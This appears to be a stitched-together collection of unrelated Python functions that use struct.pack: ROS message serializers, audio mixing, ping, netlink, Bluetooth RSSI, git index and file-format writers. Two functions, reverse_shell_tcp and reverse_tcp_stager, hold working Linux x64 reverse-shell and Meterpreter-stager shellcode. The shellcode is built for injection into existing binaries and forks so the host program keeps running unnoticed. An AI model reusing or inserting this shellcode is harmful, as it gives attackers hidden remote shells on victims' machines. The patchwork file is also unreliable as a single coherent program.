def serialize(self, buff): """ serialize message into buffer :param buff: buffer, ``StringIO`` """ try: _x = self.agent_one length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode("utf-8") length = len(_x) buff.write(struct.pack("<I%ss" % length, length, _x)) _x = self.agent_two length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode("utf-8") length = len(_x) buff.write(struct.pack("<I%ss" % length, length, _x)) _x = self buff.write( _struct_6d.pack(_x.rotationx, _x.rotationy, _x.angle, _x.referencex, _x.referencey, _x.evaluation) ) except struct.error as se: self._check_types(struct.error("%s: '%s' when writing '%s'" % (type(se), str(se), str(_x)))) except TypeError as te: self._check_types(ValueError("%s: '%s' when writing '%s'" % (type(te), str(te), str(_x))))
def proc_gentlink(self): #get GELINK Header info cmd='TASKSTATS\0' mlen=len(cmd) + 4 msg_ts=array.array(str('B')) msg_ts.fromstring(struct.pack("BBxx", CTRL_CMD_GETFAMILY, 0)) msg_ts.fromstring(struct.pack("HH", mlen, CTRL_ATTR_FAMILY_NAME)) msg_ts.fromstring(cmd) tmp=((4 - (len(msg_ts) % 4)) & 0x3) msg_ts.fromstring('\0' * ((4 - (len(cmd) % 4)) & 0x3)) nlmhdr_msg=array.array(str('B'),struct.pack(str('=IHHII'), len(msg_ts) + 16, NETLINK_GENERIC, NLM_F_REQUEST, 0, 0)) nlmhdr_msg.extend(msg_ts) self.socket.send(nlmhdr_msg) data = self.socket.recv(65536)#(16384) data=self.unpack_nlhdr(data) data=self.unpack_genlhdr(data) while len(data) > 0: data=self.unpack_attr_hdr(data) # if self.flags & 0x2 == 0: if debug>0: print "End of receiving message!" return
def ConvertXmlToTHCsv(xmlfile): tree = ET.parse(xmlfile) THCsv = tree.getroot() if THCsv.tag != 'THCsv': return blockcount = len(THCsv) rows = [] for row in THCsv: textlist = [] for text in row: textlist.append(text.find('sc').text) rows.append(textlist) csv = open(os.path.splitext(xmlfile)[0], 'wb') csv.write(struct.pack('<I', len(rows))) for row in rows: csv.write(struct.pack('<I', len(row))) for text in row: text = text.encode('936') csv.write(struct.pack('<I', len(text))) csv.write(text)
def serialize(self, buff): """ serialize message into buffer :param buff: buffer, ``StringIO`` """ try: _x = self buff.write(_struct_3I.pack(_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs)) _x = self.header.frame_id length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) _x = self buff.write(_struct_4i.pack(_x.count, _x.nch, _x.length, _x.data_bytes)) length = len(self.src) buff.write(_struct_I.pack(length)) for val1 in self.src: length = len(val1.wavedata) buff.write(_struct_I.pack(length)) pattern = '<%sf'%length buff.write(struct.pack(pattern, *val1.wavedata)) except struct.error as se: self._check_types(se) except TypeError as te: self._check_types(te)
def serialize(self): r = "" r += struct.pack("<Q", self.nServices) r += self.pchReserved r += socket.inet_aton(self.ip) r += struct.pack(">H", self.port) return r
def mix_files(a, b, c, chann = 2, phase = -1.): f1 = wave.open(a,'r') f2 = wave.open(b,'r') f3 = wave.open(c,'w') f3.setnchannels(chann) f3.setsampwidth(2) f3.setframerate(44100) f3.setcomptype('NONE','Not Compressed') frames = min(f1.getnframes(), f2.getnframes()) print "Mixing files, total length %.2f s..." % (frames / 44100.) d1 = f1.readframes(frames) d2 = f2.readframes(frames) for n in range(frames): if not n%(5*44100): print n // 44100, 's' if chann < 2: d3 = struct.pack('h', .5 * (struct.unpack('h', d1[2*n:2*n+2])[0] + struct.unpack('h', d2[2*n:2*n+2])[0])) else: d3 = ( struct.pack('h', phase * .3 * struct.unpack('h', d1[2*n:2*n+2])[0] + .7 * struct.unpack('h', d2[2*n:2*n+2])[0]) + struct.pack('h', .7 * struct.unpack('h', d1[2*n:2*n+2])[0] + phase * .3 * struct.unpack('h', d2[2*n:2*n+2])[0]) ) f3.writeframesraw(d3) f3.close()
def reverse_shell_tcp(self, flItms, CavesPicked={}): """ Modified from metasploit payload/linux/x64/shell_reverse_tcp to correctly fork the shellcode payload and continue normal execution. """ if self.PORT is None: print ("Must provide port") return False #64bit shellcode self.shellcode1 = "\x6a\x39\x58\x0f\x05\x48\x85\xc0\x74\x0c" self.shellcode1 += "\x48\xBD" self.shellcode1 += struct.pack("<Q", self.e_entry) self.shellcode1 += "\xff\xe5" self.shellcode1 += ("\x6a\x29\x58\x99\x6a\x02\x5f\x6a\x01\x5e\x0f\x05" "\x48\x97\x48\xb9\x02\x00") self.shellcode1 += struct.pack("!H", self.PORT) self.shellcode1 += self.pack_ip_addresses() self.shellcode1 += ("\x51\x48\x89" "\xe6\x6a\x10\x5a\x6a\x2a\x58\x0f\x05\x6a\x03\x5e\x48\xff\xce" "\x6a\x21\x58\x0f\x05\x75\xf6\x6a\x3b\x58\x99\x48\xbb\x2f\x62" "\x69\x6e\x2f\x73\x68\x00\x53\x48\x89\xe7\x52\x57\x48\x89\xe6" "\x0f\x05") self.shellcode = self.shellcode1 return (self.shellcode1)
def update_sha(sha, f): if f: sha.update(f.read()) f.seek(0) sha.update(pack('I', filesize(f))) else: sha.update(pack('I', 0))
def spi_transfer(data): if len(data) > 1024: data = data[:1024] temp = struct.pack(">BH", OPCODE_SPI_TXFR, len(data)) + data crc = crc16_buff(temp) tx_data = struct.pack(">H", sync) + temp + struct.pack(">H", crc) # print "Data in TX Buffer:" + ':'.join(x.encode('hex') for x in tx_data) if ser.inWaiting() > 0: rx_data = ser.read(ser.inWaiting()) print "Data in RX Buffer:" + ":".join(x.encode("hex") for x in rx_data) ser.write(tx_data) time.sleep(1) print str(ser.inWaiting()) + " waiting." rx_data = ser.read(len(tx_data)) print "SPI RX Data:" + ":".join(x.encode("hex") for x in rx_data) print rx_data calc_crc = crc16_buff(rx_data[2:-2]) if struct.pack(">H", calc_crc) == rx_data[-2:]: print "Checksum Match" else: print "Checksum Fail" if ord(rx_data[2]) == OPCODE_SPI_TXFR: return rx_data[5:-2] else: print "No Opcode Found!" return rx_data
def sendCMDreceiveATT(self, data_length, code, data): checksum = 0 total_data = ['$', 'M', '<', data_length, code] + data for i in struct.pack('<2B%dh' % len(data), *total_data[3:len(total_data)]): checksum = checksum ^ ord(i) total_data.append(checksum) try: start = time.time() b = None b = self.ser.write(struct.pack('<3c2B%dhB' % len(data), *total_data)) while True: header = self.ser.read() if header == '$': header = header+self.ser.read(2) break datalength = struct.unpack('<b', self.ser.read())[0] code = struct.unpack('<b', self.ser.read()) data = self.ser.read(datalength) temp = struct.unpack('<'+'h'*(datalength/2),data) self.ser.flushInput() self.ser.flushOutput() elapsed = time.time() - start self.attitude['angx']=float(temp[0]/10.0) self.attitude['angy']=float(temp[1]/10.0) self.attitude['heading']=float(temp[2]) self.attitude['elapsed']=round(elapsed,3) self.attitude['timestamp']="%0.2f" % (time.time(),) return self.attitude except Exception, error: #print "\n\nError in sendCMDreceiveATT." #print "("+str(error)+")\n\n" pass
def writev5_1conflicteddata(conflictedentries, reucdata, dirdata): global writtenbytes for d in sorted(conflictedentries): for f in d: if d["pathname"] == "": filename = d["filename"] else: filename = d["pathname"] + "/" + d["filename"] dirdata[filename]["cr"] = fw.tell() try: dirdata[filename]["ncr"] += 1 except KeyError: dirdata[filename]["ncr"] = 1 fwrite(d["pathname"] + d["filename"]) fwrite("\0") stages = set() fwrite(struct.pack("!b", 0)) for i in xrange(0, 2): fwrite(struct.pack("!i", d["mode"])) if d["mode"] != 0: stages.add(i) for i in sorted(stages): print i fwrite(binascii.unhexlify(d["sha1"])) writecrc32() for f in reucdata[d]: print f return dirdata
def writev5_0directories(paths, treeextensiondata): offsets = dict() subtreenr = dict() # Calculate subtree numbers for p in sorted(paths, reverse=True): splited = p.split("/") if p not in subtreenr: subtreenr[p] = 0 if len(splited) > 1: i = 0 path = "" while i < len(splited) - 1: path += "/" + splited[i] i += 1 if path[1:] not in subtreenr: subtreenr[path[1:]] = 1 else: subtreenr[path[1:]] += 1 for p in paths: offsets[p] = writtenbytes fwrite(struct.pack("!Q", 0)) fwrite(p.split("/")[-1] + "\0") p += "/" if p in treeextensiondata: fwrite(struct.pack("!ll", int(treeextensiondata[p]["entry_count"]), int(treeextensiondata[p]["subtrees"]))) if (treeextensiondata[p]["entry_count"] != "-1"): fwrite(binascii.unhexlify(treeextensiondata[p]["sha1"])) else: # If there is no cache-tree data we assume the entry is invalid fwrite(struct.pack("!ii", -1, subtreenr[p.strip("/")])) return offsets
def serialize_numpy(self, buff, numpy): """ serialize message with numpy array types into buffer :param buff: buffer, ``StringIO`` :param numpy: numpy python module """ try: _x = self buff.write(_struct_3I.pack(_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs)) _x = self.header.frame_id length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) _x = self buff.write(_struct_2I.pack(_x.status.goal_id.stamp.secs, _x.status.goal_id.stamp.nsecs)) _x = self.status.goal_id.id length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) buff.write(_struct_B.pack(self.status.status)) _x = self.status.text length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) _x = self buff.write(_struct_3f.pack(_x.feedback.forward_dist_x, _x.feedback.forward_dist_y, _x.feedback.rotation_dist)) except struct.error as se: self._check_types(se) except TypeError as te: self._check_types(te)
def save(self, path, items): # TODO: purge old cache with atomic_file(path) as f: c = 0 f.write(struct.pack("I", c)) # check is marshalable and compatible with broadcast can_marshal = marshalable(items) for v in items: if can_marshal: try: r = 0, marshal.dumps(v) except Exception: r = 1, cPickle.dumps(v, -1) can_marshal = False else: r = 1, cPickle.dumps(v, -1) f.write(msgpack.packb(r)) c += 1 yield v bytes = f.tell() if bytes > 10 << 20: logger.warning("cached result is %dMB (larger than 10MB)", bytes >> 20) # count f.seek(0) f.write(struct.pack("I", c))
def _write_key_sect(self, outfile): # Writes the key section header, key block index, and all the key blocks to # outfile. # outfile: a file-like object, opened in binary mode. keyblocks_total_size = sum(len(b.get_block()) for b in self._key_blocks) if self._version == "2.0": preamble = struct.pack(b">QQQQQ", len(self._key_blocks), self._num_entries, self._keyb_index_decomp_size, self._keyb_index_comp_size, keyblocks_total_size) preamble_checksum = struct.pack(b">L", zlib.adler32(preamble)) if(self._encrypt): preamble = _salsa_encrypt(preamble, self._encrypt_key) outfile.write(preamble) outfile.write(preamble_checksum) else: preamble = struct.pack(b">LLLL", len(self._key_blocks), self._num_entries, self._keyb_index_decomp_size, keyblocks_total_size) if(self._encrypt): preamble = _salsa_encrypt(preamble, self._encrypt_key) outfile.write(preamble) outfile.write(self._keyb_index) for b in self._key_blocks: outfile.write(b.get_block())
def tsigverify(pkt, keys, vertime = None): if vertime is None: vertime = int(time.time()) if len(pkt.adlist) < 1: return proto.FORMERR sr = pkt.adlist[-1] pkt.adlist = pkt.adlist[:-1] if not sr.head.istype("TSIG") or sr.head.rclass != rec.CLASSANY: return proto.FORMERR for key in keys: if key.name == sr.head.name: break else: return proto.BADKEY if key.algo.cname != sr.data["algo"]: return proto.BADKEY pkt.tsigctx = ctx = tsigctx(key, pkt, sr) other = sr.data["other"] msg = pkt.encode() msg += key.name.canonwire() msg += struct.pack(">HL", rec.CLASSANY, 0) msg += key.algo.cname.canonwire() msg += struct.pack(">Q", sr.data["stime"])[-6:] msg += struct.pack(">3H", sr.data["fudge"], sr.data["err"], len(other)) msg += other digest = key.sign(msg) if digest != sr.data["mac"]: pkt.tsigctx = proto.BADSIG return proto.BADSIG if vertime != 0: if abs(vertime - sr.data["stime"]) > sr.data["fudge"]: pkt.tsigctx = proto.BADTIME return proto.BADTIME return key
def get_lockdata(): if sys.platform.startswith('atheos'): start_len = "qq" else: try: os.O_LARGEFILE except AttributeError: start_len = "ll" else: start_len = "qq" if (sys.platform.startswith(('netbsd', 'freebsd', 'openbsd', 'bsdos')) or sys.platform == 'darwin'): if struct.calcsize('l') == 8: off_t = 'l' pid_t = 'i' else: off_t = 'lxxxx' pid_t = 'l' lockdata = struct.pack(off_t + off_t + pid_t + 'hh', 0, 0, 0, fcntl.F_WRLCK, 0) elif sys.platform in ['aix3', 'aix4', 'hp-uxB', 'unixware7']: lockdata = struct.pack('hhlllii', fcntl.F_WRLCK, 0, 0, 0, 0, 0, 0) elif sys.platform in ['os2emx']: lockdata = None else: lockdata = struct.pack('hh'+start_len+'hh', fcntl.F_WRLCK, 0, 0, 0, 0, 0) if lockdata: if verbose: print 'struct.pack: ', repr(lockdata) return lockdata
def getRSSI(self): """Detects whether the device is near by or not""" addr = self.address # Open hci socket hci_sock = bt.hci_open_dev() hci_fd = hci_sock.fileno() # Connect to device (to whatever you like) bt_sock = bluetooth.BluetoothSocket(bluetooth.L2CAP) bt_sock.settimeout(10) result = bt_sock.connect_ex((addr, 1)) # PSM 1 - Service Discovery try: # Get ConnInfo reqstr = struct.pack("6sB17s", bt.str2ba(addr), bt.ACL_LINK, "\0" * 17) request = array.array("c", reqstr ) handle = fcntl.ioctl(hci_fd, bt.HCIGETCONNINFO, request, 1) handle = struct.unpack("8xH14x", request.tostring())[0] # Get RSSI cmd_pkt=struct.pack('H', handle) rssi = bt.hci_send_req(hci_sock, bt.OGF_STATUS_PARAM, bt.OCF_READ_RSSI, bt.EVT_CMD_COMPLETE, 4, cmd_pkt) rssi = struct.unpack('b', rssi[3])[0] # Close sockets bt_sock.close() hci_sock.close() return rssi except Exception, e: return None
def write_mmio_reg( self, phys_address, size, value ): if size == 8: buf = struct.pack( '=Q', value ) elif size == 4: buf = struct.pack( '=I', value&0xFFFFFFFF ) elif size == 2: buf = struct.pack( '=H', value&0xFFFF ) elif size == 1: buf = struct.pack( '=B', value&0xFF ) else: return False return self.write_phys_mem( ((phys_address>>32)&0xFFFFFFFF), (phys_address&0xFFFFFFFF), size, buf )
def send_one_ping(my_socket, dest_addr, ID): """ Send one ping to the given >dest_addr<. """ dest_addr = socket.gethostbyname(dest_addr) # Header is type (8), code (8), checksum (16), id (16), sequence (16) my_checksum = 0 # Make a dummy heder with a 0 checksum. header = struct.pack("bbHHh", ICMP_ECHO_REQUEST, 0, my_checksum, ID, 1) bytesInDouble = struct.calcsize("d") data = (192 - bytesInDouble) * "Q" data = struct.pack("d", time.time()) + data # Calculate the checksum on the data and the dummy header. my_checksum = checksum(header + data) # Now that we have the right checksum, we put that in. It's just easier # to make up a new header than to stuff it into the dummy. header = struct.pack( "bbHHh", ICMP_ECHO_REQUEST, 0, socket.htons(my_checksum), ID, 1 ) packet = header + data my_socket.sendto(packet, (dest_addr, 1)) # Don't know about the 1
def reverse_tcp_stager(self, flItms, CavesPicked={}): """ FOR USE WITH STAGER TCP PAYLOADS INCLUDING METERPRETER Modified from metasploit payload/linux/x64/shell/reverse_tcp to correctly fork the shellcode payload and continue normal execution. """ if self.PORT is None: print ("Must provide port") return False #64bit shellcode self.shellcode1 = "\x6a\x39\x58\x0f\x05\x48\x85\xc0\x74\x0c" self.shellcode1 += "\x48\xBD" self.shellcode1 += struct.pack("<Q", self.e_entry) self.shellcode1 += "\xff\xe5" self.shellcode1 += ("\x48\x31\xff\x6a\x09\x58\x99\xb6\x10\x48\x89\xd6\x4d\x31\xc9" "\x6a\x22\x41\x5a\xb2\x07\x0f\x05\x56\x50\x6a\x29\x58\x99\x6a" "\x02\x5f\x6a\x01\x5e\x0f\x05\x48\x97\x48\xb9\x02\x00") self.shellcode1 += struct.pack("!H", self.PORT) self.shellcode1 += self.pack_ip_addresses() self.shellcode1 += ("\x51\x48\x89\xe6\x6a\x10\x5a\x6a\x2a\x58\x0f" "\x05\x59\x5e\x5a\x0f\x05\xff\xe6") self.shellcode = self.shellcode1 return (self.shellcode1)
def serialize_numpy(self, buff, numpy): """ serialize message with numpy array types into buffer :param buff: buffer, ``StringIO`` :param numpy: numpy python module """ try: _x = self buff.write(_struct_3I.pack(_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs)) _x = self.header.frame_id length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) _x = self buff.write(_struct_2I.pack(_x.status.goal_id.stamp.secs, _x.status.goal_id.stamp.nsecs)) _x = self.status.goal_id.id length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) buff.write(_struct_B.pack(self.status.status)) _x = self.status.text length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) buff.write(_struct_f.pack(self.feedback.percent_complete)) except struct.error as se: self._check_types(struct.error("%s: '%s' when writing '%s'" % (type(se), str(se), str(_x)))) except TypeError as te: self._check_types(ValueError("%s: '%s' when writing '%s'" % (type(te), str(te), str(_x))))
def test_wrap_round_robin(self): cluster = Mock(spec=Cluster) cluster.metadata = Mock(spec=Metadata) hosts = [Host(str(i), SimpleConvictionPolicy) for i in range(4)] for host in hosts: host.set_up() def get_replicas(keyspace, packed_key): index = struct.unpack('>i', packed_key)[0] return list(islice(cycle(hosts), index, index + 2)) cluster.metadata.get_replicas.side_effect = get_replicas policy = TokenAwarePolicy(RoundRobinPolicy()) policy.populate(cluster, hosts) for i in range(4): query = Statement(routing_key=struct.pack('>i', i), keyspace='keyspace_name') qplan = list(policy.make_query_plan(None, query)) replicas = get_replicas(None, struct.pack('>i', i)) other = set(h for h in hosts if h not in replicas) self.assertEqual(replicas, qplan[:2]) self.assertEqual(other, set(qplan[2:])) # Should use the secondary policy for i in range(4): qplan = list(policy.make_query_plan()) self.assertEqual(set(qplan), set(hosts))
def writeData(self,f): self.offset=f.tell(); print("BindShape "+str(len(self.bindShape))); for b in self.bindShape: f.write(struct.pack("<f",b)); f.write(struct.pack("<I",len(self.joints)));#joints for j in self.joints: f.write(struct.pack("<I",len(j.reference)+1));#mesh f.write(bytearray('#',"ascii")); f.write(bytearray(j.reference,"ascii")); f.write(struct.pack("<I",len(self.joints)*16));#joints for b in self.jointBindPoses: f.write(struct.pack("<f",b)); #Omit bounding box #f.write(struct.pack("<f",0));#Omit bounding box #f.write(struct.pack("<f",0));#Omit bounding box #f.write(struct.pack("<f",0));#Omit bounding box #f.write(struct.pack("<f",0));#Omit bounding box #f.write(struct.pack("<f",0));#Omit bounding box #f.write(struct.pack("<f",0));#Omit bounding box #Omit bounding sphere #f.write(struct.pack("<f",0));#Omit bounding sphere #f.write(struct.pack("<f",0));#Omit bounding sphere #f.write(struct.pack("<f",0));#Omit bounding sphere #f.write(struct.pack("<f",0));#Omit bounding sphere return ;
def serialize(self): r = "" r += struct.pack("<i", self.nVersion) r += ser_vector(self.vin) r += ser_vector(self.vout) r += struct.pack("<I", self.nLockTime) return r
def encode_hybi(buf, opcode, base64=False): """ Encode a HyBi style WebSocket frame. Optional opcode: 0x0 - continuation 0x1 - text frame (base64 encode buf) 0x2 - binary frame (use raw buf) 0x8 - connection close 0x9 - ping 0xA - pong """ if base64: buf = b64encode(buf) b1 = 0x80 | (opcode & 0x0f) # FIN + opcode payload_len = len(buf) if payload_len <= 125: header = pack('>BB', b1, payload_len) elif payload_len > 125 and payload_len < 65536: header = pack('>BBH', b1, 126, payload_len) elif payload_len >= 65536: header = pack('>BBQ', b1, 127, payload_len) #self.msg("Encoded: %s", repr(header + buf)) return header + buf, len(header), 0
def __init__(self, fp, bits, width, height): self.fp = fp self.bits = bits self.width = width self.height = height if bits == 1: ncols = 2 elif bits == 8: ncols = 256 elif bits == 24: ncols = 0 else: raise ValueError(bits) self.linesize = align32((self.width*self.bits+7)/8) self.datasize = self.linesize * self.height info = struct.pack('<IiiHHIIIIII', 40, self.width, self.height, 1, self.bits, 0, self.datasize, 0, 0, 0, 0) assert len(info) == 40, len(info) header = struct.pack('<ccIHHI', 'B', 'M', 14+40+self.datasize, 0, 0, 14+40) assert len(header) == 14, len(header) self.fp.write(header) self.fp.write(info) if ncols == 2: self.fp.write('\x00\x00\x00\xff\xff\xff') elif ncols == 256: for i in xrange(256): self.fp.write(struct.pack('bbb', i,i,i)) self.pos0 = self.fp.tell() self.pos1 = self.pos0 + self.datasize return
def serialize_numpy(self, buff, numpy): """ serialize message with numpy array types into buffer :param buff: buffer, ``StringIO`` :param numpy: numpy python module """ try: _x = self buff.write(_struct_if.pack(_x.a, _x.b)) _x = self.c length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) if python3: buff.write(struct.pack('<I%sB'%length, length, *_x)) else: buff.write(struct.pack('<I%ss'%length, length, _x)) buff.write(self.d.tostring()) length = len(self.e) buff.write(_struct_I.pack(length)) pattern = '<%sd'%length buff.write(self.e.tostring()) except struct.error as se: self._check_types(struct.error("%s: '%s' when writing '%s'" % (type(se), str(se), str(_x)))) except TypeError as te: self._check_types(ValueError("%s: '%s' when writing '%s'" % (type(te), str(te), str(_x))))
def __init__(self, is_binary, file_name): self.magic = struct.pack('3s', "SFP") self.file_type = struct.pack('b', is_binary) self.sfile_name = file_name self.data = '' self.sfilesize = 0 self.random_data()
def readBlock(self,adr,length,filename): print('Read block') f = file(filename, 'wb') pkt = struct.pack('>I',adr) command = struct.pack('B',self.MTK_COMMAND_READ16) self._port.write(command) if self._port.read(1) != command: raise Exception('Invalid resonse command') self._port.write(pkt) if self._port.read(4) != pkt: raise Exception('Invalid resonse address') pkt = struct.pack('>I', length) self._port.write(pkt) if self._port.read(4) != pkt: raise Exception('Invalid resonse length') var = self._port.read(length*2) out = ''.join([c for t in zip(var[1::2], var[::2]) for c in t]) f.write(out) f.close()